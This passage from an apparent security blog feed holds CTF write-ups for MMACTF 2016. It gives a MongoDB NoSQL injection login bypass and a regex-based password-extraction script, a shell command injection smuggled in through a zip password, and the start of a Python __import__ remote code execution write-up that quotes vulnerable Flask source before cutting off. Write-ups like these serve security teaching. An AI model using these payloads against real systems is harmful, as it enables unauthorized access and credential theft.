href="http://gap.chal.ctf.westerns.tokyo/login.php">http://gap.chal.ctf.westerns.tokyo/login.php</a></p> <p>Obviously the first thing to try is SQL injection but after messing around with the login page for sometime, I understood it has nothing to do with SQL. The next attempt was to try NoSQL and then I got some very interesting result. From the initial injection, it seems the backend database is MongoDB and I decided to read a bit more about it.</p> <p>In simple terms, MongoDB works like this:</p> <p>Request: <code class="language-plaintext highlighter-rouge">login.php?user=admin&amp;password=1</code></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="nv">$collection</span><span class="o">-&gt;</span><span class="nf">find</span><span class="p">(</span><span class="k">array</span><span class="p">(</span> <span class="s2">"username"</span> <span class="o">=&gt;</span> <span class="s2">"admin"</span><span class="p">,</span> <span class="s2">"passwd"</span> <span class="o">=&gt;</span> <span class="s2">"1"</span> <span class="p">));</span></code></pre></figure> <h2 id="solution">Solution</h2> <p>The username and password is collected from the incoming data and the database is searched directly using this data. So what if we can pass objects or arrays ?</p> <p>Request: <code class="language-plaintext highlighter-rouge">login.php?user[$gt]=&amp;password[$gt]=</code></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="nv">$collection</span><span class="o">-&gt;</span><span class="nf">find</span><span class="p">(</span><span class="k">array</span><span class="p">(</span> <span class="s2">"username"</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"</span><span class="nv">$gt</span><span class="s2">"</span> <span class="o">=&gt;</span> <span class="mi">1</span><span class="p">),</span> <span class="s2">"passwd"</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"</span><span class="nv">$gt</span><span class="s2">"</span> <span class="o">=&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">));</span></code></pre></figure> <p>This will bypass the Authentication scheme and will drop us right into the first account in the database, which is admin ! So now we are now logged in as <strong>admin</strong> ! But the flag is the password of admin so we need to extract it. I googled on how to extract data but that didn’t gave me much options. Later I came to know about <code class="language-plaintext highlighter-rouge">$regex</code> using which we can compare the password character by character. So here is the logic:</p> <p>We initiate request with <code class="language-plaintext highlighter-rouge">user=admin&amp;password[$regex]=T.*</code>. You can see that this gives a <code class="language-plaintext highlighter-rouge">302</code> redirect because the password starts with T (as password is flag and according to rules, flags starts with <code class="language-plaintext highlighter-rouge">TWCTF</code>). For all other characters, it gives back the status code <code class="language-plaintext highlighter-rouge">200</code>. We can easily automate this to find the rest of the password</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span> <span class="kn">import</span> <span class="nn">string</span> <span class="c1"># We are sure that password is the flag which starts with "TWCTF{" # and ends with "}" </span> <span class="n">flag</span> <span class="o">=</span> <span class="s">"TWCTF{"</span> <span class="n">url</span> <span class="o">=</span> <span class="s">"http://gap.chal.ctf.westerns.tokyo/login.php"</span> <span class="c1"># Each time a 302 redirect is seen, we should restart the loop </span> <span class="n">restart</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">while</span> <span class="n">restart</span><span class="p">:</span> <span class="n">restart</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># Characters like *, ., &amp;, and + has to be avoided because we use regex </span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">digits</span> <span class="o">+</span> <span class="s">"!@#$%^()@_{}"</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">i</span> <span class="n">post_data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'user'</span><span class="p">:</span> <span class="s">'admin'</span><span class="p">,</span> <span class="s">'password[$regex]'</span><span class="p">:</span> <span class="n">payload</span> <span class="o">+</span> <span class="s">".*"</span><span class="p">}</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">post_data</span><span class="p">,</span> <span class="n">allow_redirects</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="c1"># A correct password means we get a 302 redirect </span> <span class="k">if</span> <span class="n">r</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">302</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">restart</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">payload</span> <span class="c1"># Exit if "}" gives a valid redirect </span> <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s">"}"</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Flag: "</span> <span class="o">+</span> <span class="n">flag</span><span class="p">)</span> <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="k">break</span></code></pre></figure> <h2 id="output">Output</h2> <p>Script works the following way:</p> <p>1) Since the password is the flag, we are sure that it starts with <code class="language-plaintext highlighter-rouge">TWCTF{</code> so this can be used to verify if what we are doing is correct.</p> <p>2) I assumed that characters like <code class="language-plaintext highlighter-rouge">+</code>, <code class="language-plaintext highlighter-rouge">*</code> and <code class="language-plaintext highlighter-rouge">&amp;</code> will not be there because it could break the Regex (and lucky it wasn’t there !)</p> <p>3) Script stops when we get a 302 redirection when the character is <code class="language-plaintext highlighter-rouge">}</code> because we are sure that the end character will be <code class="language-plaintext highlighter-rouge">}</code> (again, because password is same as flag).</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">TWCTF</span><span class="p">{</span><span class="n">w</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wa</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">was</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wass</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wassh</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wassho</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="n">s</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="n">su</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="nb">sum</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="n">summ</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="n">summe</span> <span class="n">TWCTF</span><span class="p">{</span><span class="n">wasshoi</span><span class="err">!</span><span class="n">summer</span></code></pre></figure> <h2 id="references">References</h2> <p>These are some of the awesome references which came in handy during solving this problem:</p> <ol> <li><a href="https://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/">Mongodb is vulnerable to SQL injection in PHP at least</a></li> <li><a href="http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html">Hacking NodeJs and MongoDB</a></li> </ol> Mon, 05 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/05/mongo-db-password-extraction-mmactf-100/ https://blog.0daylabs.com/2016/09/05/mongo-db-password-extraction-mmactf-100/ ctf Command Injection via Bruteforce ZipCracker - MMACTF 2016 Web 200 writeup <h2 id="introduction">Introduction</h2> <p>Zip cracker was truly an interesting challenge. The moment I saw the application, I was sure that the vulnearbility will either be Symlink attacks (if the zip is returning the extracted content) or Command Injection (If the zip is taking userinput inside commnds). Since the application just tells us that the password is correct or wrong and never shows the extracted files back to the user, Symlink attacks might not work. So next best case is command injection !</p> <h2 id="challenge">Challenge</h2> <p>So we could create a zip with a password and we can upload it to the ZipCracker along with a dict.txt (where the possible passwords are listed line by line). We have the option to chooze <code class="language-plaintext highlighter-rouge">unzip</code> or not, but both times it returns seperate outputs.</p> <p>Challenge URL: <a href="http://zipcracker.chal.ctf.westerns.tokyo/">http://zipcracker.chal.ctf.westerns.tokyo</a></p> <p>So here is what I guessed from the challenge:</p> <p>1) When trying to bruteforce without the <code class="language-plaintext highlighter-rouge">unzip</code> option, it returns (if correct password is found) <code class="language-plaintext highlighter-rouge">Possible password: paSSw0rd ()</code>.</p> <p>2) When trying to bruteforce with the <code class="language-plaintext highlighter-rouge">unzip</code> option, it returns (if correct password is found) <code class="language-plaintext highlighter-rouge">Password Found ! pw == p@ssw0rd</code>.</p> <p>Now if we compare the 2 cases, we can see that in the 2nd case, actual extraction of the zip happens while it’s not the case with first. So the chances of command injections are high in the 2nd case.</p> <p>Next question is how do we inject ? The possible place is on zip password. What if we encrypts zip with passwords containing special characters like <code class="language-plaintext highlighter-rouge">;</code>, <code class="language-plaintext highlighter-rouge">&amp;</code> which are also valid command seperators ?</p> <p>Eventhough my approach here was right, it took me a long time to figure out something so silly ! The mistakes I did was:</p> <p>1) The filename was included inside double quotes in the server but I was trying without quotes so essentially what ever I try, server takes it as a string as I am in the string context.</p> <p>2) Once our injection is done, we should comment out the rest of the commands that gets added by the server or else our injection might not work properly. I actually forgot to give a <code class="language-plaintext highlighter-rouge">#</code> at the end of the injection string :O (How could I ?)</p> <h2 id="solution">Solution:</h2> <p>After finding my mistakes I clearly understood what all I was missing and the final payload becomes <code class="language-plaintext highlighter-rouge">asd"; ls #</code> and this will output the files in which there was an interesting file called <code class="language-plaintext highlighter-rouge">flag.</code> So the final payload becomes <code class="language-plaintext highlighter-rouge">asd"; cat flag.php #</code></p> <p>The problem can automatically be cracked using the python script below (my team has writen a script so that we don’t have to manually upload each time we channge password):</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span> <span class="kn">import</span> <span class="nn">json</span> <span class="kn">import</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="nn">os</span> <span class="k">try</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="s">'zipped.zip'</span><span class="p">)</span> <span class="k">except</span> <span class="nb">OSError</span><span class="p">:</span> <span class="k">pass</span> <span class="n">password</span> <span class="o">=</span> <span class="s">"""asd"; cat flag.php #"""</span> <span class="c1"># password of zip file </span><span class="n">zipfilename</span> <span class="o">=</span> <span class="s">'zipfile.zip'</span> <span class="c1">#the zip name that gets posted </span><span class="n">dictfilename</span> <span class="o">=</span> <span class="s">'dictionary.txt'</span> <span class="c1">#the dict name that gets posted </span><span class="n">dictfilecontents</span> <span class="o">=</span> <span class="s">"""password1</span><span class="se">\n</span><span class="s">password12</span><span class="se">\n</span><span class="s">password123</span><span class="se">\n</span><span class="s">asd"; cat flag.php #</span><span class="se">\n</span><span class="s">1</span><span class="se">\n</span><span class="s">"""</span> <span class="c1">#dictionary file contents </span><span class="n">unzip</span> <span class="o">=</span> <span class="bp">True</span> <span class="c1">#zips the random.txt file with password into zipped.zip </span><span class="n">subprocess</span><span class="p">.</span><span class="n">call</span><span class="p">([</span><span class="s">'zip'</span><span class="p">,</span> <span class="s">'--password'</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="s">'zipped.zip'</span><span class="p">,</span> <span class="s">'random.txt'</span><span class="p">])</span> <span class="n">dictfile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'dict.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="n">dictfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">dictfilecontents</span><span class="p">)</span> <span class="n">dictfile</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">url</span> <span class="o">=</span> <span class="s">"http://zipcracker.chal.ctf.westerns.tokyo/"</span> <span class="n">multiple_files</span> <span class="o">=</span> <span class="p">[</span> <span class="p">(</span><span class="s">'zip'</span><span class="p">,</span> <span class="p">(</span><span class="n">zipfilename</span><span class="p">,</span> <span class="nb">open</span><span class="p">(</span><span class="s">'zipped.zip'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">),</span> <span class="s">'application/x-zip-compressed'</span><span class="p">)),</span> <span class="p">(</span><span class="s">'dict'</span><span class="p">,</span> <span class="p">(</span><span class="n">dictfilename</span><span class="p">,</span> <span class="nb">open</span><span class="p">(</span><span class="s">'dict.txt'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">),</span> <span class="s">'text/plain'</span><span class="p">))</span> <span class="p">]</span> <span class="n">data</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">if</span> <span class="n">unzip</span><span class="p">:</span> <span class="n">data</span><span class="p">[</span><span class="s">'unzip'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'on'</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">files</span><span class="o">=</span><span class="n">multiple_files</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> <span class="k">print</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span></code></pre></figure> <p>Just run the script <code class="language-plaintext highlighter-rouge">python zipcracker.py</code> and it will output the results on the screen !</p> Mon, 05 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/05/command-injection-zip-bruteforce/ https://blog.0daylabs.com/2016/09/05/command-injection-zip-bruteforce/ ctf Remote Code Execution via Python __import__() - MMACTF 2016 Tsurai Web 300 writeup <h2 id="introduction">Introduction</h2> <p>After a successful completion of <a href="/2016/09/05/mongo-db-password-extraction-mmactf-100/">MongoDB NoSQL injection</a>(Web 100), I moved on to a more challenging question, which is tsuari web, a 300 point problem.</p> <h2 id="challenge">Challenge</h2> <p>A quick look at the challenge tells us that there are options to <code class="language-plaintext highlighter-rouge">register</code>, <code class="language-plaintext highlighter-rouge">login</code> and also <code class="language-plaintext highlighter-rouge">upload files</code> of any type to the server via image upload (Never more interesting). We are also given the source code of the website which seems to be written in Flask. A quick peek at the code reveals some interesting information:</p> <p>Challenge URL: <a href="http://tweb.chal.ctf.westerns.tokyo">http://tweb.chal.ctf.westerns.tokyo</a></p> <p>File: app.py</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span> <span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">session</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">send_from_directory</span> <span class="kn">import</span> <span class="nn">os</span><span class="p">,</span> <span class="n">sys</span> <span class="n">AUTHFILE</span> <span class="o">=</span> <span class="s">'passwd'</span> <span class="n">SALT</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">[</span><span class="s">'TW_SALT'</span><span class="p">]</span> <span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="s">'Tsurai Web'</span><span class="p">,</span> <span class="n">static_folder</span><span class="o">=</span><span class="s">'templates/assets'</span><span class="p">)</span> <span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">[</span><span class="s">'SECRET_KEY'</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">[</span><span class="s">'TW_SECRET'</span><span class="p">]</span> <span class="n">sys</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">'data'</span><span class="p">)</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">index</span><span class="p">():</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">):</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'index.html'</span><span class="p">)</span> <span class="n">config</span> <span class="o">=</span> <span class="nb">__import__</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">)))</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'password'</span><span class="p">)</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'msg'</span><span class="p">)</span> <span class="k">if</span> <span class="n">password</span><span class="p">:</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'albums.html'</span><span class="p">,</span> <span class="n">msg</span><span class="o">=</span><span class="s">"Your password is {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">),</span> <span class="n">imgs</span><span class="o">=</span><span class="n">config</span><span class="p">.</span><span class="n">imgs</span><span class="p">)</span> <span class="k">elif</span> <span class="n">msg</span><span class="p">:</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'albums.html'</span><span class="p">,</span> <span class="n">msg</span><span class="o">=</span><span class="n">msg</span><span class="p">,</span> <span class="n">imgs</span><span class="o">=</span><span class="n">config</span><span class="p">.</span><span class="n">imgs</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'albums.html'</span><span class="p">,</span> <span class="n">msg</span><span class="o">=</span><span class="s">"Hello, {} !"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">)),</span> <span class="n">imgs</span><span class="o">=</span><span class="n">config</span><span class="p">.</span><span class="n">imgs</span><span class="p">)</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/login'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">'POST'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'username'</span><span class="p">]</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'password'</span><span class="p">]</span> <span class="k">if</span> <span class="n">auth</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">session</span><span class="p">[</span><span class="s">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="n">username</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'index.html'</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"Login failed."</span><span class="p">)</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/logout'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> <span class="n">session</span><span class="p">.</span><span class="n">pop</span><span class="p">(</span><span class="s">'username'</span><span class="p">,</span> <span class="bp">None</span><span class="p">)</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/register'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">'POST'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">register</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'username'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">is_valid</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'index.html'</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"Invalid username."</span><span class="p">)</span> <span class="k">if</span> <span class="n">user_exists</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'index.html'</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"User already exists."</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">genpw</span><span class="p">()</span> <span class="n">hashed</span> <span class="o">=</span> <span class="n">h</span><span class="p">(</span><span class="n">password</span><span class="o">+</span><span class="n">SALT</span><span class="p">)</span> <span class="nb">open</span><span class="p">(</span><span class="n">AUTHFILE</span><span class="p">,</span> <span class="s">'a'</span><span class="p">).</span><span class="n">write</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">{username}:{hashed}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="o">**</span><span class="nb">locals</span><span class="p">()))</span> <span class="n">os</span><span class="p">.</span><span class="n">mkdir</span><span class="p">(</span><span class="s">'data/{}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">username</span><span class="p">)))</span> <span class="nb">open</span><span class="p">(</span><span class="s">'data/{}.py'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">username</span><span class="p">)),</span> <span class="s">'w'</span><span class="p">).</span><span class="n">write</span><span class="p">(</span><span class="s">"imgs = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">repr</span><span class="p">([])))</span> <span class="n">session</span><span class="p">[</span><span class="s">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="n">username</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/?password='</span><span class="o">+</span><span class="n">password</span><span class="p">)</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/upload'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">'POST'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">upload</span><span class="p">():</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">):</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span> <span class="k">if</span> <span class="s">'file'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">:</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/?msg='</span><span class="o">+</span><span class="n">q</span><span class="p">(</span><span class="s">"No file specified."</span><span class="p">))</span> <span class="n">config</span> <span class="o">=</span> <span class="nb">__import__</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">)))</span> <span class="n">imgs</span> <span class="o">=</span> <span class="n">config</span><span class="p">.</span><span class="n">imgs</span> <span class="n">req_file</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">[</span><span class="s">'file'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">req_file</span> <span class="ow">or</span> <span class="n">req_file</span><span class="p">.</span><span class="n">filename</span> <span class="o">==</span> <span class="s">""</span><span class="p">:</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/?msg='</span><span class="o">+</span><span class="n">q</span><span class="p">(</span><span class="s">"No file specified."</span><span class="p">))</span> <span class="n">fname</span> <span class="o">=</span> <span class="n">req_file</span><span class="p">.</span><span class="n">filename</span> <span class="k">if</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">imgs</span><span class="p">:</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/?msg='</span><span class="o">+</span><span class="n">q</span><span class="p">(</span><span class="s">'File already exists.'</span><span class="p">))</span> <span class="n">imgs</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">fname</span><span class="p">)</span> <span class="n">req_file</span><span class="p">.</span><span class="n">save</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="s">"data/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">))),</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">basename</span><span class="p">(</span><span class="n">fname</span><span class="p">)))</span> <span class="nb">open</span><span class="p">(</span><span class="s">"data/{}.py"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">))),</span> <span class="s">'w'</span><span class="p">).</span><span class="n">write</span><span class="p">(</span><span class="s">"imgs = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">repr</span><span class="p">(</span><span class="n">imgs</span><span class="p">)))</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/?msg='</span><span class="o">+</span><span class="n">q</span><span class="p">(</span><span class="s">"Upload succeccful."</span><span class="p">))</span> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/show'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">show</span><span class="p">():</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">):</span> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span> <span class="n">filename</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'filename'</span><span class="p">)</span> <span class="k">return</span> <span class="n">send_from_directory</span><span class="p">(</span><span class="s">"data/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">h</span><span class="p">(</span><span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'username'</span><span class="p">))),</span> <span class="n">filename</span><span class="p">)</span> <span class="k">def</span> <span class="nf">is_valid</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="kn">import</span> <span class="nn">re</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="sa">r</span><span class="s">"\A[0-9a-zA-Z]{,20}\Z"</span><span class="p">,</span> <span class="n">username</span><span class="p">):</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">def</span> <span class="nf">user_exists</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="n">auths</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">AUTHFILE</span><span class="p">).</span><span class="n">read</span><span class="p">().</span><span class="n">strip</span><span class="p">().</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">auths</span><span class="p">:</span> <span class="k">if</span> <span class="s">':'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span> <span class="k">continue</span> <span class="n">u</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">':'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">if</span> <span class="n">u</span> <span class="o">==</span> <span class="n">username</span><span class="p">:</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">def</span> <span class="nf">auth</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">auths</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">AUTHFILE</span><span class="p">).</span><span class="n">read</span><span class="p">().</span><span class="n">strip</span><span class="p">().</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">auths</span><span class="p">:</span> <span class="k">if</span> <span class="s">':'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span> <span class="k">continue</span> <span class="n">u</span><span class="p">,</span> <span class="n">p</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">':'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="n">hashed</span> <span class="o">=</span> <span class="n">h</span><span class="p">(</span><span class="n">password</span><span class="o">+</span><span class="n">SALT</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">u</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">hashed</span><span class="p">):</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">return</span> <span 